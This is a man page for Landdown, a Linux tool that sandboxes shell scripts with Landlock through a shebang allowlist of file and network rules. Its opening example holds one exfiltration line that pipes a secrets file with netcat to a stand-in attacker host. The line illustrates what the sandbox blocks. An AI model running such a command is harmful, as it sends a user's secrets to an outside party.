landdown

Simple Sandboxing for shell scripts.

git clone git://mccd.space/landdown

landdown.1 (2101B)

.TH "landdown" 1 2026-06-30

.SH NAME

Landdown - Simple shell script sandbox

.SH DESCRIPTION

.PP
Landdown is an easy-to-use utility for Linux that allows you to
sandbox shell scripts with Landlock. Just like Landlock, Landdown
"aims to protect you against the security impacts of bugs or
unexpected/malicious behavior". To use it, prepend your script with the
landdown shebang and a ruleset, and then write your shell script like
you would normally. For example:

.EX
#!/usr/bin/env landdown
ro /bin
ro /lib
#!/bin/sh
# The following works
echo "Hi"
# The following fails
cat $HOME/my-secrets | nc exploit.com 1337
.EE

.PP
Landdown locks down file and network access of a script based on rules
explicitly listed in the allowlist.


.SH SUPPORTED RULES

.EX
rof <file>
rwf <file>
ro <dir>
rw <dir>
bind <port>
connect <port>
.EE

.PP
Each rule can be used zero or more times.

.PP
The syntax is

.EX
#!/usr/bin/env landdown
<rules...>
#!<interpreter>
<script content...>
.EE

.SH INSTALL

.EX
go install git.sr.ht/~marcc/landdown@latest
.EE

.PP
Arch Linux <https://aur.archlinux.org/packages/landdown-git>

.SH EXAMPLES

.SS Access a file
.PP
Write the following script

.EX
#!/usr/bin/env landdown
ro /bin
ro /lib
rwf /tmp/some-file.txt
#!/bin/sh
echo "Edit" > /tmp/some-file.txt
.EE

.PP
Try removing rwf /tmp/some-file.txt and the script should fail.

.PP
Note: the file needs to exist in order for landdown to work; run touch
/tmp/some-file.txt to test.

.SS Network access
.PP
Write the following script

.EX
#!/usr/bin/env landdown
ro /bin
ro /lib
ro /etc/ssl
rof /etc/resolv.conf
connect 443
#!/bin/bash
curl https://www.google.com
.EE

.PP
Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443
and it should fail. Network access needs to be explicitly set.

.SH CONTRIBUTIONS

Contributions are welcome. Please send them to my public
inbox <~marcc/public-inbox@lists.sr.ht>

.SH SEE ALSO

.PP
\fBsh\fR(1) - section on ulimit

.PP
Good Practices <https://docs.kernel.org/userspace-api/landlock.html#good-practices>

.SS Alternatives

\fBbubblewrap\fR(1)
\fBfirejail\fR(1)
\fBlandrun\fR(1)